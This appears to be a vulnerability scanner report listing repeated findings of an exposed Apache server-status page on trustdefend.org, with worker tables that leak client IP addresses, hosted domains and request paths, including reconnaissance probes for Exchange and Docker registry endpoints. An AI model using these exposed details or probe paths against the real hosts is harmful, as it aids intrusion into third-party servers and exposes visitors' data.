      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqConnChildSlotClientVHostRequest
      
      0-278172240/110/386709W
      0.15700.013.6022056.40
      13.59.20.224lesnoj-prijut.ru:8080GET / HTTP/1.0
      
      1-278215540/109/386283W
      0.16000.03.8322636.99
      109.70.100.67akbru.ru:8080GET /akkumulyatory/?bfilter=m0:18;a7:0-89;a8:1-118;a9:0-96;a10:
      
      2-278229630/20/380105_
      0.0201610.00.9322056.29
      213.180.203.14mebozon.ru:8080GET /shkafy/raspashnye/shkaf-knignyj-mone-31-glyantsevyj-mdf HT
      
      3-27890630/487/374406W
      0.77300.024.4022244.03
      13.59.20.224lesnoj-prijut.ru:8080GET / HTTP/1.0
      
      4-278230820/6/371021_
      0.000320.00.3622264.29
      146.70.97.239jenny.linkpc.net:8080GET / HTTP/1.0
      
      5-27899230/530/365168_
      0.750740.029.1921085.28
      136.243.220.211mirmoda24.ru:8080GET /catalog/yubka-lola-kristina_659538/ HTTP/1.0
      
      6-278190520/92/364626_
      0.13050.04.3621342.75
      176.59.0.114apteka-fz.ru:8080GET / HTTP/1.0
      
      7-278213420/66/353394W
      0.101000.02.8920689.52
      78.107.252.54intelspro.ru:8080POST /gw/ HTTP/1.0
      
      8-27899700/393/348626_
      0.5802010.0107.4720142.17
      37.228.114.248japan-tackle.ru:8080PUT /exchange1c?type=catalog&mode=file&filename=archive_1.zip&P
      
      9-278227440/1179/344074W
      1.722900.057.1420587.21
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      10-278230860/7/340580W
      0.00000.00.1620025.30
      37.228.114.248japan-tackle.ru:8080GET /exchange1c?type=catalog&mode=import&filename=import.xml&PH
      
      11-278-0/0/340000.
      0.042000.00.0020183.70
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      12-278182120/245/325917_
      0.36040.015.5919810.96
      176.59.0.114apteka-fz.ru:8080GET / HTTP/1.0
      
      13-278125780/179/326257W
      0.23300.06.2318282.60
      13.59.20.224lesnoj-prijut.ru:8080GET / HTTP/1.0
      
      14-278134210/331/322967_
      0.47018410.015.4618746.92
      213.21.215.165mas-oyama.ru:8080GET /otvety-na-pisma-4/ HTTP/1.0
      
      15-278144080/139/311114W
      0.211700.07.3418588.25
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      16-278161150/279/306509W
      0.36600.013.7818611.43
      13.59.20.224lesnoj-prijut.ru:8080GET / HTTP/1.0
      
      17-278150950/433/302757_
      0.62000.018.5817431.92
      145.255.10.135professional-test.ru:8080GET /favicon.ico HTTP/1.0
      
      18-278199720/136/292071W
      0.21900.05.8317306.31
      185.240.102.28ldk-sokol.ru:8080POST /?mailpoet_router&endpoint=cron_daemon&action=run&data=eyJ
      
      19-278199730/192/280937W
      0.27000.06.0016749.91
      137.184.150.232trustdefend.org:8080GET /server-status HTTP/1.0
      
      20-278-0/0/276354.
      0.7122900.00.0016434.06
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      21-278-0/0/272770.
      0.1820900.00.0015755.84
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      22-27867960/455/263352W
      0.71000.039.7415976.03
      2.95.42.125pz16.ru:8080POST /account/login HTTP/1.0
      
      23-278-0/0/257155.
      0.3217200.00.0015016.02
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      24-278-0/0/247471.
      0.1914300.00.0014466.56
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      25-278-0/0/240109.
      0.1874000.00.0014108.74
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      26-278-0/0/231667.
      0.0280300.00.0013453.77
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      27-278-0/0/226503.
      0.1078500.00.0012977.58
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      28-278-0/0/218984.
      0.3663600.00.0012090.55
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      29-278-0/0/216563.
      0.0280800.00.0012027.30
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      30-278-0/0/208258.
      0.0180900.00.0011263.55
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      31-278-0/0/204690.
      0.0678100.00.0011187.64
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      32-278-0/0/196349.
      1.2044000.00.0011003.79
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      33-278-0/0/185854.
      0.0575100.00.0010478.37
      <
      Found on 2023-08-23 03:20
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e6a8eb42e6a8eb42e874d6b9

      Apache Status
      
      Apache Server Status for www.trustdefend.org (via 127.0.0.1)
      
      Server Version: Apache/2.4.6 (CloudLinux) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
      Server MPM: prefork
      Server Built: Jun  9 2023 19:20:27
      
      Current Time: Monday, 21-Aug-2023 13:09:34 MSK
      Restart Time: Friday, 18-Aug-2023 12:09:53 MSK
      Parent Server Config. Generation: 194
      Parent Server MPM Generation: 193
      Server uptime:  3 days 59 minutes 41 seconds
      Server load: 14.90 16.25 17.75
      Total accesses: 7145897 - Total Traffic: 451.8 GB
      CPU Usage: u55.61 s13.76 cu0 cs0 - .0264% CPU load
      27.2 requests/sec - 1.8 MB/second - 66.3 kB/request
      46 requests currently being processed, 9 idle workers
      _WWWW.WW__..WW.WWW.W_.WWW..WW.WWWWWWW_...W_WW.W..W_W_W.W.WWW.WWW
      _WW....C...W.................W.W.....W...........W..............
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqConnChildSlotClientVHostRequest
      
      0-193188460/374/223592_
      0.660440.014.8214366.86
      62.221.109.228gbi-24.ru:8080GET /luki/ HTTP/1.0
      
      1-193114050/19/222690W
      0.02700.00.7714471.67
      5.255.231.22sibpartner.ru:8080GET /zamochno-skobyanye-izdeliya/zamki-vreznye/?attrb[16]=27-35
      
      2-19338400/115/219435W
      0.21300.05.3014350.71
      5.255.231.22sibpartner.ru:8080GET /kuhonnye-mojki/kamennye/?attrb[20]=1&attrb[23]=1&attrb[24]
      
      3-193136360/14/212828W
      0.03600.00.5414372.45
      213.180.203.130sibpartner.ru:8080GET /kuhonnye-mojki/kamennye/?attrb[12]=3&attrb[20]=1&attrb[34]
      
      4-193109280/59/213784W
      0.09000.01.7614588.94
      5.141.156.196nzt48shop.ru:8080GET /wp-admin/admin-ajax.php?action=rest-nonce HTTP/1.0
      
      5-193-0/0/210948.
      0.52400.00.0013679.37
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      6-19389460/39/211553W
      0.07500.02.0813810.31
      213.180.203.130sibpartner.ru:8080GET /kuhonnye-mojki/kamennye/?attrb[12]=3&attrb[19]=4&attrb[20]
      
      7-19390280/116/206501W
      0.23400.03.6813501.35
      95.108.213.208sibpartner.ru:8080GET /kuhonnye-mojki/kamennye/?attrb[16]=11&attrb[20]=1&attrb[22
      
      8-193137090/46/197360_
      0.070210.00.6812594.27
      32.220.241.29next.run.place:8080GET / HTTP/1.0
      
      9-193137110/47/195245_
      0.07000.01.0913035.86
      185.54.228.120hard.line.pm:8080GET /images/title-bg-right.png HTTP/1.0
      
      10-193-0/0/195578.
      0.511300.00.0012887.72
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      11-193-0/0/195863.
      0.381200.00.0013138.38
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      12-193266510/257/186183W
      0.49000.08.6512760.16
      206.81.1.88trustdefend.org:8080GET /server-status HTTP/1.0
      
      13-19341200/28/180316W
      0.03600.00.7611427.50
      5.255.231.19sibpartner.ru:8080GET /kuhonnye-mojki/kamennye/?attrb[19]=4&attrb[20]=1&attrb[21]
      
      14-193-0/0/177386.
      0.252700.00.0011451.53
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      15-193192120/294/174601W
      0.541300.010.5811828.80
      5.255.231.145sibpartner.ru:8080GET /kuhonnye-mojki/kamennye/?attrb[16]=11&attrb[20]=1&attrb[23
      
      16-193104410/38/171089W
      0.07200.01.7311692.14
      213.180.203.158sibpartner.ru:8080GET /kuhonnye-mojki/kamennye/?attrb[20]=1&attrb[23]=1-25&attrb[
      
      17-19344200/92/167254W
      0.18700.04.6110838.83
      95.108.213.159sibpartner.ru:8080GET /kuhonnye-mojki/kamennye/?attrb[17]=2&attrb[18]=1&attrb[20]
      
      18-193-0/0/157530.
      0.15100.00.0010365.73
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      19-193192390/383/154958W
      0.72500.013.5210608.97
      213.180.203.142sibpartner.ru:8080GET /kuhonnye-mojki/kamennye/?attrb[20]=1&attrb[23]=1-25-32&att
      
      20-19343200/143/150049_
      0.28043860.05.4910405.17
      95.108.213.109videoshok.ru:8080GET /paper+origami HTTP/1.0
      
      21-193-0/0/146919.
      0.05700.00.009614.02
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      22-193285200/160/139734W
      0.32200.05.839698.11
      213.180.203.129sibpartner.ru:8080GET /kuhonnye-mojki/kamennye/?attrb[12]=3&attrb[16]=11&attrb[20
      
      23-19396950/57/136122W
      0.082700.01.128728.32
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      24-19362920/56/128684W
      0.111200.02.788653.13
      78.107.252.54intelspro.ru:8080POST /gw/ HTTP/1.0
      
      25-193-0/0/123366.
      0.022600.00.008406.97
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      26-193-0/0/115169.
      0.072200.00.007809.02
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      27-19357400/152/112462W
      0.261200.03.977293.41
      185.240.102.28ldk-sokol.ru:8080POST /?mailpoet_router&endpoint=cron_daemon&action=run&data=eyJ
      
      28-19397780/50/105333W
      0.08200.01.866650.64
      5.255.231.198sibpartner.ru:8080GET /kuhonnye-mojki/kamennye/?attrb%5B25%5D=4-28-63-65 HTTP/1.0
      
      29-193-0/0/103854.
      0.721700.00.006499.27
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      30-19397800/18/97539W
      0.021300.01.266189.17
      213.180.203.142sibpartner.ru:8080GET /kuhonnye-mojki/kamennye/?attrb[19]=4&attrb[28]=2&attrb[34]
      
      31-193192860/308/94527W
      0.581100.012.915904.87
      213
      Found on 2023-08-21 10:09
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e6a8eb42e6a8eb4272f6f0e3

      Apache Status
      
      Apache Server Status for www.trustdefend.org (via 127.0.0.1)
      
      Server Version: Apache/2.4.6 (CloudLinux) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
      Server MPM: prefork
      Server Built: Jun  9 2023 19:20:27
      
      Current Time: Saturday, 19-Aug-2023 17:58:59 MSK
      Restart Time: Friday, 18-Aug-2023 12:09:53 MSK
      Parent Server Config. Generation: 95
      Parent Server MPM Generation: 94
      Server uptime:  1 day 5 hours 49 minutes 6 seconds
      Server load: 7.48 8.37 8.55
      Total accesses: 2481828 - Total Traffic: 189.1 GB
      CPU Usage: u11.01 s2.48 cu0 cs0 - .0126% CPU load
      23.1 requests/sec - 1.8 MB/second - 79.9 kB/request
      6 requests currently being processed, 11 idle workers
      ___W__W..........._.._._.......W.W....W......._......._.........
      ........W_......................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqConnChildSlotClientVHostRequest
      
      0-94148170/35/76248_
      0.06013010.01.536029.62
      5.255.231.31khochu-prodat.ru:8080GET /link.php?link=12873&b=12873 HTTP/1.0
      
      1-94104900/135/75385_
      0.310690.018.225704.07
      188.114.60.56stom-ch.ru:8080GET /combine/c745ea99842f970bf7937a537a1c87a3-1689687848/ HTTP/
      
      2-94152700/12/77077_
      0.03000.00.996044.36
      161.35.27.144trustdefend.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor
      
      3-94148480/26/72245W
      0.04100.00.945834.03
      20.15.240.187zimag.ru:8080GET /dekorativnoe-osveshchenie/svetodiodnye-girlyandy-nit/girly
      
      4-94152900/11/75713_
      0.01000.00.156274.64
      161.35.27.144trustdefend.org:8080GET /v2/_catalog HTTP/1.0
      
      5-94152910/6/72430_
      0.0105790.00.245670.55
      87.76.42.109automation-system.ru:8080GET /main/15-regulyator/type-of-control/90-408-p-pi-pid.html HT
      
      6-94120240/81/74415W
      0.171210.03.985643.60
      78.85.48.184blue-issyk-kul.ru:8080GET /Film_sait_2_570.mp4 HTTP/1.0
      
      7-94-0/0/70898.
      0.223700.00.005597.19
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      8-94-0/0/68015.
      0.024500.00.005007.27
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      9-94-0/0/68735.
      0.264000.00.005463.44
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      10-94-0/0/69499.
      0.083800.00.005259.27
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      11-94-0/0/68917.
      0.086700.00.005484.53
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      12-94-0/0/66530.
      0.114900.00.005424.63
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      13-94-0/0/64291.
      0.255000.00.004964.75
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      14-94-0/0/64372.
      0.014700.00.005029.11
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      15-94-0/0/64154.
      0.225800.00.004912.62
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      16-94-0/0/62313.
      0.206800.00.005001.13
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      17-94-0/0/59348.
      0.137500.00.004537.64
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      18-94127930/64/59619_
      0.150250.02.744771.60
      193.186.4.15turpotok.com:8080GET /spa-oteli-leningradskoy-oblasti/ HTTP/1.0
      
      19-94-0/0/57948.
      0.621700.00.004489.58
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      20-94-0/0/55917.
      0.661600.00.004662.27
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      21-94127990/79/53531_
      0.15000.03.364151.48
      188.114.60.56stom-ch.ru:8080GET /combine/c745ea99842f970bf7937a537a1c87a3-1689687848 HTTP/1
      
      22-94-0/0/52119.
      0.091500.00.004189.06
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      23-94128010/48/49778_
      0.070710.02.753915.09
      188.114.60.56stom-ch.ru:8080GET /combine/2d2fa1bfd51404acc4db3bc7b7dfac2f-1691069750/ HTTP/
      
      24-94-0/0/48595.
      0.014600.00.004087.20
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      25-94-0/0/44007.
      0.014800.00.003539.44
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      26-94-0/0/43041.
      0.044300.00.003454.97
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      27-94-0/0/39360.
      0.034400.00.002932.72
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      28-94-0/0/39660.
      0.634200.00.002911.27
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      29-94-0/0/38389.
      0.028000.00.002836.63
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      30-94-0/0/37092.
      0.056400.00.002779.44
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      31-94128140/99/34697W
      0.21000.05.332543.71
      161.35.27.144trustdefend.org:8080GET /server-status HTTP/1.0
      
      32-94-0/0/31881.
      0.073400.00.002613.09
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      33-94128190/54/30457W
      0.09700.09.302510.37
      185.240.102.28ldk-sokol.ru:8080POST /?mailpoet_router&endpoint=cron_daemon&action=run&data=eyJ
      
      34-94-0/0/28794.
      0.035900.00.002388.59
      
      Found on 2023-08-19 14:58
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e6a8eb42e6a8eb42c5840c46

      Apache Status
      
      Apache Server Status for www.trustdefend.org (via 127.0.0.1)
      
      Server Version: Apache/2.4.6 (CloudLinux) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
      Server MPM: prefork
      Server Built: Jun  9 2023 19:20:27
      
      Current Time: Friday, 18-Aug-2023 18:58:31 MSK
      Restart Time: Friday, 18-Aug-2023 12:09:53 MSK
      Parent Server Config. Generation: 42
      Parent Server MPM Generation: 41
      Server uptime:  6 hours 48 minutes 38 seconds
      Server load: 8.44 8.28 8.54
      Total accesses: 689161 - Total Traffic: 52.9 GB
      CPU Usage: u12.91 s3.08 cu0 cs0 - .0652% CPU load
      28.1 requests/sec - 2.2 MB/second - 80.5 kB/request
      16 requests currently being processed, 10 idle workers
      ._WWW_W...WWWW._W.___WW.W_WW.WW._.__............................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqConnChildSlotClientVHostRequest
      
      0-41-0/0/21365.
      0.001000.00.001610.51
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      1-4136440/335/20965_
      0.71014180.017.671555.11
      5.141.156.196nzt48shop.ru:8080GET /wp-admin/admin-ajax.php?action=rest-nonce HTTP/1.0
      
      2-41151580/39/21325W
      0.08000.01.521685.03
      5.29.21.14bluepumpkin.ru:8080GET /writing-tools/markers/tekstovydelitel-faber-castell-tl-46/
      
      3-41164670/18/20408W
      0.03000.00.911763.50
      66.249.76.163den35.ru:8080GET /product.php?z/D665267 HTTP/1.0
      
      4-41153570/25/21738W
      0.051710.05.911988.54
      85.140.6.181blue-issyk-kul.ru:8080GET /Film_sait_2_570.mp4 HTTP/1.0
      
      5-41151920/53/21430_
      0.1404850.02.151737.33
      203.215.167.15tiktok-recharge.com:8080GET /coins/ HTTP/1.0
      
      6-41142740/31/20794W
      0.06100.09.551695.93
      66.249.76.162den35.ru:8080GET /product.php?z/M1220700 HTTP/1.0
      
      7-41-0/0/20517.
      0.05100.00.001624.47
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      8-41-0/0/18394.
      0.04500.00.001411.98
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      9-41-0/0/19826.
      0.06000.00.001473.76
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      10-41143160/40/19797W
      0.074400.02.031531.42
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      11-4194850/238/20237W
      0.43000.015.341729.01
      66.249.66.89den35.ru:8080GET /product.php?z/A234809 HTTP/1.0
      
      12-41164700/14/18706W
      0.03000.00.641466.60
      167.94.145.53miryoga.ru:8080GET / HTTP/1.0
      
      13-41112240/126/17834W
      0.26200.05.801313.84
      213.180.203.152aboutcinema.ru:8080GET /feed/turbo/ HTTP/1.0
      
      14-41-0/0/18514.
      0.16300.00.001438.83
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      15-41102210/189/18380_
      0.40000.020.891478.03
      139.144.150.45trustdefend.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor
      
      16-41158400/32/16933W
      0.05000.01.831382.87
      139.144.150.45trustdefend.org:8080GET /server-status HTTP/1.0
      
      17-41-0/0/16510.
      0.02700.00.001169.41
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      18-41102350/142/17083_
      0.25014430.06.481366.94
      66.249.66.9den35.ru:8080GET /product.php?z/L357882 HTTP/1.0
      
      19-41102360/164/15546_
      0.35030.08.311266.52
      5.253.61.250tiktok-recharge.com:8080POST /wp-cron.php?doing_wp_cron=1692374311.25724601745605468750
      
      20-41102750/206/16520_
      0.4001320.020.521216.54
      89.23.112.106prorocketbank.ru:8080GET / HTTP/1.0
      
      21-41158990/36/16072W
      0.07300.01.231382.20
      95.108.213.216zimag.ru:8080GET /svetovye-konsoli-i-figury/svetodiodnye-figury-na-metallich
      
      22-41112260/83/15538W
      0.153600.05.911322.96
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      23-41-0/0/15052.
      0.29400.00.001045.00
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      24-41159020/28/13098W
      0.04100.02.031177.27
      5.255.231.80gomelklimat.by:8080GET /catalog/mdv-mdsa-09hrfn1mdoa-09hfn1 HTTP/1.0
      
      25-41159050/28/11832_
      0.0501740.01.031029.13
      144.76.107.199aeroflot-ru-bonus.ru:8080GET /https;/main.travelfornamewalking.ga/-https;-main.travelfor
      
      26-4153910/246/13257W
      0.51000.041.411197.40
      66.249.76.163den35.ru:8080GET /product.php?z/O1190702 HTTP/1.0
      
      27-41159560/16/10916W
      0.021700.01.62858.52
      185.240.102.28ldk-sokol.ru:8080POST /?mailpoet_router&endpoint=cron_daemon&action=run&data=eyJ
      
      28-41-0/0/11175.
      0.00800.00.00724.65
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      29-41164990/10/11475W
      0.01000.00.70802.19
      213.180.203.194yarustomsk.ru:8080GET /?yclid=7710547526903176844 HTTP/1.0
      
      30-41165000/11/10207W
      0.01000.00.48764.13
      66.249.66.165den35.ru:8080GET /product.php?z/G290927 HTTP/1.0
      
      31-41-0/0/7389.
      0.04200.00.00485.32
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      32-41159620/24/8181_
      0.0303190.01.07737.62
      213.180.203.66den35.ru:8080GET /z/L1018470 HTTP/1.0
      
      33-41-0/0/8385</
      Found on 2023-08-18 15:58
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e6a8eb42e6a8eb42893b8abb

      Apache Status
      
      Apache Server Status for www.trustdefend.org (via 127.0.0.1)
      
      Server Version: Apache/2.4.6 (CloudLinux) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
      Server MPM: prefork
      Server Built: Jun  9 2023 19:20:27
      
      Current Time: Thursday, 17-Aug-2023 16:34:37 MSK
      Restart Time: Sunday, 13-Aug-2023 03:53:03 MSK
      Parent Server Config. Generation: 251
      Parent Server MPM Generation: 250
      Server uptime:  4 days 12 hours 41 minutes 33 seconds
      Server load: 7.69 7.14 7.92
      Total accesses: 13080777 - Total Traffic: 818.6 GB
      CPU Usage: u36.08 s8.86 cu0 cs0 - .0115% CPU load
      33.4 requests/sec - 2.1 MB/second - 65.6 kB/request
      14 requests currently being processed, 8 idle workers
      _._WWW_WWWW__.....W..W............_....WW.._....WWW.._..........
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqConnChildSlotClientVHostRequest
      
      0-25023980/584/472860_
      0.89000.032.0230096.06
